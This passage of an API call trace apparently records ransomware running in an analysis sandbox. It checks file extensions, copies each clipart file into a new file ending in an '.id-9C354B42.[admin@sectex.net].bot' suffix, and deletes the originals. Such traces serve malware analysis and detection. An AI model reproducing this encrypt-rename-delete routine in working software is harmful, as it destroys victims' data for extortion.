	[0144.338] lstrlenW (lpString=".xlsx") returned 5
	[0144.338] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.338] lstrlenW (lpString=".ppt") returned 4
	[0144.338] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.338] lstrlenW (lpString=".zip") returned 4
	[0144.339] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.339] lstrlenW (lpString=".rar") returned 4
	[0144.339] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.339] lstrlenW (lpString=".bz2") returned 4
	[0144.339] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.339] lstrlenW (lpString=".7z") returned 3
	[0144.339] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.339] lstrlenW (lpString=".dbf") returned 4
	[0144.339] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.339] lstrlenW (lpString=".1cd") returned 4
	[0144.339] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.339] lstrlenW (lpString=".jpg") returned 4
	[0144.339] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.339] lstrlenW (lpString=".doc") returned 4
	[0144.339] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.339] lstrlenW (lpString=".docx") returned 5
	[0144.339] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.339] lstrlenW (lpString=".pdf") returned 4
	[0144.339] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.339] lstrlenW (lpString=".xls") returned 4
	[0144.339] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.339] lstrlenW (lpString=".xlsx") returned 5
	[0144.339] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.339] lstrlenW (lpString=".ppt") returned 4
	[0144.339] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.339] lstrlenW (lpString=".zip") returned 4
	[0144.339] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.340] lstrlenW (lpString=".rar") returned 4
	[0144.340] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.340] lstrlenW (lpString=".bz2") returned 4
	[0144.340] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.340] lstrlenW (lpString=".7z") returned 3
	[0144.340] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.340] lstrlenW (lpString=".dbf") returned 4
	[0144.340] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.340] lstrlenW (lpString=".1cd") returned 4
	[0144.340] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.340] lstrlenW (lpString=".jpg") returned 4
	[0144.340] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.340] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.340] lstrlenW (lpString="DD01143_.WMF") returned 12
	[0144.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.349] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2140) returned 1
	[0144.349] CloseHandle (hObject=0x3cc) returned 1
	[0144.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf")) returned 0x20
	[0144.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.349] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.349] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0144.350] GetLastError () returned 0x0
	[0144.350] ReadFile (in: hFile=0x3cc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x85c, lpOverlapped=0x0) returned 1
	[0144.378] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x860, lpOverlapped=0x0) returned 1
	[0144.379] ReadFile (in: hFile=0x3cc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.379] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.379] SetEndOfFile (hFile=0x388) returned 1
	[0144.379] CloseHandle (hObject=0x388) returned 1
	[0144.380] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.380] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.381] CloseHandle (hObject=0x3cc) returned 1
	[0144.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.479] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf")) returned 1
	[0144.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.479] lstrlenW (lpString=".doc") returned 4
	[0144.479] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.480] lstrlenW (lpString=".docx") returned 5
	[0144.480] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.480] lstrlenW (lpString=".pdf") returned 4
	[0144.480] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.480] lstrlenW (lpString=".xls") returned 4
	[0144.480] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.480] lstrlenW (lpString=".xlsx") returned 5
	[0144.480] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.480] lstrlenW (lpString=".ppt") returned 4
	[0144.480] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.480] lstrlenW (lpString=".zip") returned 4
	[0144.480] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.480] lstrlenW (lpString=".rar") returned 4
	[0144.480] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.480] lstrlenW (lpString=".bz2") returned 4
	[0144.480] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.480] lstrlenW (lpString=".7z") returned 3
	[0144.480] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.480] lstrlenW (lpString=".dbf") returned 4
	[0144.480] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.480] lstrlenW (lpString=".1cd") returned 4
	[0144.480] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.480] lstrlenW (lpString=".jpg") returned 4
	[0144.480] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.480] lstrlenW (lpString=".doc") returned 4
	[0144.480] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.480] lstrlenW (lpString=".docx") returned 5
	[0144.481] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.481] lstrlenW (lpString=".pdf") returned 4
	[0144.481] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.481] lstrlenW (lpString=".xls") returned 4
	[0144.481] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.481] lstrlenW (lpString=".xlsx") returned 5
	[0144.481] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.481] lstrlenW (lpString=".ppt") returned 4
	[0144.481] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.481] lstrlenW (lpString=".zip") returned 4
	[0144.481] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.481] lstrlenW (lpString=".rar") returned 4
	[0144.481] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.481] lstrlenW (lpString=".bz2") returned 4
	[0144.481] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.481] lstrlenW (lpString=".7z") returned 3
	[0144.481] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.481] lstrlenW (lpString=".dbf") returned 4
	[0144.481] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.481] lstrlenW (lpString=".1cd") returned 4
	[0144.481] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63
	[0144.481] lstrlenW (lpString=".jpg") returned 4
	[0144.481] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.481] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.481] lstrlenW (lpString="DD01151_.WMF") returned 12
	[0144.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.482] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2960) returned 1
	[0144.482] CloseHandle (hObject=0x384) returned 1
	[0144.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf")) returned 0x20
	[0144.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.482] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.483] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.483] GetLastError () returned 0x0
	[0144.483] ReadFile (in: hFile=0x384, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xb90, lpOverlapped=0x0) returned 1
	[0144.508] WriteFile (in: hFile=0x3cc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xba0, lpOverlapped=0x0) returned 1
	[0144.509] ReadFile (in: hFile=0x384, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.509] WriteFile (in: hFile=0x3cc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.509] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.509] CloseHandle (hObject=0x3cc) returned 1
	[0144.509] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.510] SetEndOfFile (hFile=0x384) returned 1
	[0144.512] CloseHandle (hObject=0x384) returned 1
	[0144.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.512] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf")) returned 1
	[0144.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.513] lstrlenW (lpString=".doc") returned 4
	[0144.513] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.513] lstrlenW (lpString=".docx") returned 5
	[0144.513] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.513] lstrlenW (lpString=".pdf") returned 4
	[0144.513] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.513] lstrlenW (lpString=".xls") returned 4
	[0144.513] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.513] lstrlenW (lpString=".xlsx") returned 5
	[0144.513] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.513] lstrlenW (lpString=".ppt") returned 4
	[0144.513] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.513] lstrlenW (lpString=".zip") returned 4
	[0144.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.513] lstrlenW (lpString=".rar") returned 4
	[0144.513] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.513] lstrlenW (lpString=".bz2") returned 4
	[0144.513] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.513] lstrlenW (lpString=".7z") returned 3
	[0144.513] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.513] lstrlenW (lpString=".dbf") returned 4
	[0144.513] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.513] lstrlenW (lpString=".1cd") returned 4
	[0144.513] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.513] lstrlenW (lpString=".jpg") returned 4
	[0144.513] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.514] lstrlenW (lpString=".doc") returned 4
	[0144.514] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.514] lstrlenW (lpString=".docx") returned 5
	[0144.514] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.514] lstrlenW (lpString=".pdf") returned 4
	[0144.514] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.514] lstrlenW (lpString=".xls") returned 4
	[0144.514] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.514] lstrlenW (lpString=".xlsx") returned 5
	[0144.514] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.514] lstrlenW (lpString=".ppt") returned 4
	[0144.514] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.514] lstrlenW (lpString=".zip") returned 4
	[0144.514] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.514] lstrlenW (lpString=".rar") returned 4
	[0144.514] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.514] lstrlenW (lpString=".bz2") returned 4
	[0144.514] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.514] lstrlenW (lpString=".7z") returned 3
	[0144.514] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.514] lstrlenW (lpString=".dbf") returned 4
	[0144.514] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.514] lstrlenW (lpString=".1cd") returned 4
	[0144.514] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63
	[0144.514] lstrlenW (lpString=".jpg") returned 4
	[0144.514] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.515] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.515] lstrlenW (lpString="DD01160_.WMF") returned 12
	[0144.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.537] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2228) returned 1
	[0144.537] CloseHandle (hObject=0x25c) returned 1
	[0144.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf")) returned 0x20
	[0144.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.565] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.565] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.565] GetLastError () returned 0x0
	[0144.565] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8b4, lpOverlapped=0x0) returned 1
	[0144.567] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x8c0, lpOverlapped=0x0) returned 1
	[0144.568] ReadFile (in: hFile=0x31c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.568] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.568] SetEndOfFile (hFile=0x25c) returned 1
	[0144.568] CloseHandle (hObject=0x25c) returned 1
	[0144.568] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.568] SetEndOfFile (hFile=0x31c) returned 1
	[0144.572] CloseHandle (hObject=0x31c) returned 1
	[0144.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.572] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf")) returned 1
	[0144.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63
	[0144.573] lstrlenW (lpString=".doc") returned 4
	[0144.573] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.573] lstrlenW (lpString=".docx") returned 5
	[0144.573] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.573] lstrlenW (lpString=".pdf") returned 4
	[0144.573] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.573] lstrlenW (lpString=".xls") returned 4
	[0144.573] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.573] lstrlenW (lpString=".xlsx") returned 5
	[0144.573] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.573] lstrlenW (lpString=".ppt") returned 4
	[0144.573] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
